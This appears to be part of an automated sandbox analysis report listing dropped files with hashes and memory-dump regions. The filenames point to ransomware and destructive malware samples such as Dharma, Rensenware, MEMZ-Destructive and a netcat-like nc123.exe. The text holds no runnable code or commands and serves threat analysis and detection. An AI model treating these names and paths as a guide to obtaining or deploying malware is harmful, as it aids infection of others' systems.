1a03dbf17dee29b2ab2a91ff2ed24c4a

SHA1
72dce8c03a84e66fa1ae9219fed42563d8f5a3d7

SHA256
94a5b203cc3a73f5eb7acb64b294e92440f2dc2c4d8a266445609754fb5e54c6

SHA512
8e7549664dfadb74dca97b4d511401aacadb53fd3737d1de795ec8a8fb5dd10172234e02c77654dcc72c98f7aab87c44f6e264737f7996926ed179ada95f8fb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ba497511317523446c45414f4717b28d

SHA1
b5fee491be5e796a95a56c06b40dc0a34cd80c44

SHA256
0863be7b6d18abece8e1521afb046e892a23a1a5b42c192f2bb934a24bad4f7a

SHA512
6684e375664f30c78b65a1b8c2e31528f1e9b60ca17a6655f807b1ae41b64d6787f046a04a931a4121597aac50b5ccb0c56ff0afb52825e03358ca6a7b0a040e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57de79.TMP

Filesize
370B

MD5
3bf8869edc4167301034058e62aad352

SHA1
52e13a4dbc39ea2322c64801ea58ec9be1a8450a

SHA256
5d0dbae6e9bb9635a80dc96ef99a82dec3c2465f524773adaa05de2ccea2d7ae

SHA512
75a63c42f3bd26a26c7f2f779cfcaa58b9c26dec6c6c57a987cd19748479180b6b503b950b2d7ca17eea4b02ff426028ff5b0ce5b820657ccfa8474ff739c237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe6252be.TMP

Filesize
2KB

MD5
31558af5bfd50118ed31ca1e80d26ddc

SHA1
df10b691b884556dfc6fa313904bab16a0d738c0

SHA256
1080f0ca6c280e44f372efa45af3f1a2d5536b3ccd577a1c393422ac89d06910

SHA512
11f1e25b9a9c95c6f9be20bf536692883199fce2a83f32c80b5453c577e7ada17ccdbb5de19453a27eecf2ad98ec99ad53d69d648ad884d127e4106c674d0691

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000011

Filesize
16KB

MD5
8feb503d057a1dfc7121b0aa2c7cc10f

SHA1
0d25b47e8482de37b7f615205b8a45162e1049d4

SHA256
e816b1086f600fa2096189c847f34de90dabd33b899de28ce199682eaf17c713

SHA512
a193f820d8719a47d6f52ff9ff2bf76c27ea3611e87a582543c8a55595af25cb3d1bb00913f8c2a4f2ed027ea2749717faf84d75e887f32610dce4d6ce105595

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
c2b6056b7ec7d0eb54c406499ca19401

SHA1
d4f18d647363a1acac96e1f571b96a9b098873ab

SHA256
97df4e76e3958979e3bcb739da3430fe50e3b03cf13f6693185ed3e9493bf14d

SHA512
f9065582551cf5185c5c4cc7402a49cb1b52521e4fa8de248a8e692d8ae96f7097e6954df29450768054b3580f70d8ad74ce6c60cf0a7518926d3d51fa01e689

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
51dc63a8ee365699b7388b729cda049a

SHA1
009f90e2642d13b9e397b48fd623e16c3f426caf

SHA256
68dc99c1165f207bf1c9e84f2eca04311ae77e2ca2b066ef70b85c52147e6428

SHA512
8e3c8223c3eae8e8e43f55e20cb3f09daaf3219a727973d607ad657d152764bac5c3922dff05909c61faf8a6e2361a4f2b55333a5906d5c62ff74fa7df51f66f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4c075ba3104f3741db26cd9193ffaec1

SHA1
03fa181536009c25331a6fab10fc82c3cf559cd7

SHA256
013d2448cfa9a1e495b05970b8b0a4c402bc1991d0bfe86589e69c9c8fc96fbe

SHA512
d5a0e4cd9e902b328f68798948d057b555b9cb0999cc0f12190102aa6d0977a55122a1a70c44880faf51e8a2ecb03fdc9e70517d97bb36b72d5d39006bc6eb46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
696b20bb4ee4ec4e3a911358c9219866

SHA1
fc855b752f6b013cf0e42f17c0761e26ac15b388

SHA256
c5e365b9690d9a787b56ad286240e5dada2fd70dc2cf4bbff47c0d7fb173db08

SHA512
294808beeefccefdb7a9a29b1c696fd9271fe69cc39b4984a4df4c65892512c7ae732978dbfe9f58efd0a2b6e1c7a4385ad5bba44f7a04bd95e27aea803420a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
691592dfe2e0e9975207c3c41cd16d61

SHA1
6f2ffc3a626e6bc5b253d2f3c6732c3c60b973e0

SHA256
55073684935eaee14c0a0abd85e0715a46dee7b7cf7912f928112f8c5c34c5e4

SHA512
0b69bbf0cb1899d55988401a2ff3c247ba627f4e468c99c39e8bf35fa63f21536156f4cd083995a6d247a5b8df841ce3348390c4b27aacae3c573ba473d47f78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
9e6739f357ca3e5b1714b4d72560d09f

SHA1
483a429429f21024b10574a4f530d1c1e150d943

SHA256
4f1c737878ab04d52c2cb7b54548e58af10d484a81258fb40f02cefe59bb05ed

SHA512
637e0d85a8bd1ad0814af1db42c762965133993c6d2bbe994e75e53b26961a880fc87dd813952d73f0ebd9a81b2d379e5686a7cbadebaf6207ed7f43618f6e72

Download Submit
C:\Users\Admin\AppData\Local\Temp\38fd861f-c05e-4fa4-9a78-8e8c40a7ed22.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-S4702.tmp\TaskHelper.exe

Filesize
599KB

MD5
b9a8153eb60656b81019cbadcad0e8b9

SHA1
69338bd08d5d55f3d4b26fde2e54329c816311e8

SHA256
21b637c646df4f842a1aa05daa916e9d3c7fb7f2fe8c6c31457c826211ae1dd6

SHA512
27985c7fb365f56f1de686c5ca30737da391fe60086e9c0fa921c90bc17ab0391616aa3d95bf03df28d58a18fdc484ee8bc313516df27474ff45eeafa7a6b0b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5572_142090627\562d8641-e31e-477f-a17f-e396db18505a.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5572_142090627\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp

Filesize
31KB

MD5
d676e0ecffe306aefd73d625b4bdd90c

SHA1
94e2b9ff5a49975927f882f0a323fdd35b94135c

SHA256
4564b242a5583620f77c571c5fe9dcd8adc08ee92762408ad98fd9a6b380ec64

SHA512
5c891edfd1b01bb5b0b293ea81340a4d4070f14b71a3c86b1fd3560687d43589d21dc4fecdafe8857ac3108fe69df426604a6b16abb755e4de2be4d6c86dbe4e

Download Submit
C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe

Filesize
92KB

MD5
0880430c257ce49d7490099d2a8dd01a

SHA1
2720d2d386027b0036bfcf9f340e325cd348e0d0

SHA256
056c3790765f928e991591cd139384b6680df26313a73711add657abc369028c

SHA512
0d7676f62b682d41fb0fe355119631a232e5d2ec99a5a0b782bbe557936a3226bbcce1a6effbba0cffde7ec048c4f7540aef0c38f158429de0adc1687bd73a11

Download Submit
C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Documents\Dharma\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\Documents\Dharma\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\Documents\Dharma\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\Documents\Dharma\sxwkiyeefcobuzdfb.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\Documents\Rensenware\.rsrc\MANIFEST\1

Filesize
490B

MD5
b7db84991f23a680df8e95af8946f9c9

SHA1
cac699787884fb993ced8d7dc47b7c522c7bc734

SHA256
539dc26a14b6277e87348594ab7d6e932d16aabb18612d77f29fe421a9f1d46a

SHA512
d4a78daf4ae93952197208752d801390ce39a519e7f5aa1360c42fc563ec0e221625b1bfec2a9564fd3dcd14c18b74d5d9fa6e57c2bced40c1f32c6814b4c523

Download Submit
C:\Users\Admin\Downloads\ChilledWindows.7z.crdownload

Filesize
4.1MB

MD5
1e19ccb892730ddd73ec22e64cb52fc4

SHA1
d96713f90b68376a0ff220f15d1767d8b4c5f32a

SHA256
97fb9203a54bffc2b65ff488ac194fb5e86157d78b97b1f02254659754c8ccab

SHA512
1461f5b630e2ac3b6fc734bd906a0f010cea6100ff3ccdd4c774b7e55e08e2f2d8983d02f28b0284f299034f28de2b904a9bb755e41a4b57683a64a3721e839e

Download Submit
C:\Users\Admin\Downloads\MEMZ-Destructive.7z.crdownload

Filesize
17KB

MD5
d91a65636b8d4b7437983e064e2580fa

SHA1
2bfaf387d22b7e9c1a54c35d8ab33fa84006ece3

SHA256
c547f9193b8fcb681dbb93968d54ac9912901097e1912ff7ad11c5a9ee13062c

SHA512
0175a90f980354b6f9a0fb66be6672c18c03a33fb547a0a16d159f18745f59fc5f4d9dae69dfd4d3bcffbc1bd3bbc73901000931dc3c12b70dde6e4e72a92f9f

Download Submit
C:\Users\Admin\Downloads\salinewin.exe-Malware-main.zip.crdownload

Filesize
12.1MB

MD5
c8bf514a334eaa148cb3c6135c2fb394

SHA1
0e47a89c3729db5a6f195c6abb04e5129d788df8

SHA256
9127560918eaefe69f1959bcb7f7e13b7e3a7ac156b564922829faaec9b96f67

SHA512
9879a258f429ef492cf495dbddd4f2b9c9fbc061e325aa8ad870ed05049b7ad595b26d223d20c55fc99f403fc9b5d0235353d71bf5d9a39ee4462838feb247ff

Download Submit
memory/2068-2631-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

Filesize
64KB

Download
memory/2068-2626-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2625-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2627-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2723-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2630-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp

Filesize
64KB

Download
memory/2068-2629-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2628-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2725-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2726-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2068-2724-0x00007FFE7BA70000-0x00007FFE7BA80000-memory.dmp

Filesize
64KB

Download
memory/2512-32070-0x0000000000400000-0x00000000004A1000-memory.dmp

Filesize
644KB

Download
memory/3684-31968-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3684-13862-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3684-4071-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/3904-32074-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3904-13863-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3904-31964-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3904-31969-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/6768-5491-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/6768-15062-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/6768-32096-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/7752-31971-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/7752-32076-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/7752-16576-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/7752-32095-0x0000000000400000-0x0000000000531000-memory.dmp

Filesize
1.2MB

Download
memory/10600-32179-0x0000000000400000-0x0000000000660000-memory.dmp

Filesize
2.4MB

Download
memory/10600-32197-0x0000000000400000-0x0000000000660000-memory.dmp

Filesize
2.4MB

Download
memory/10600-32231-0x0000000000400000-0x0000000000660000-memory.dmp

Filesize
2.4MB

Download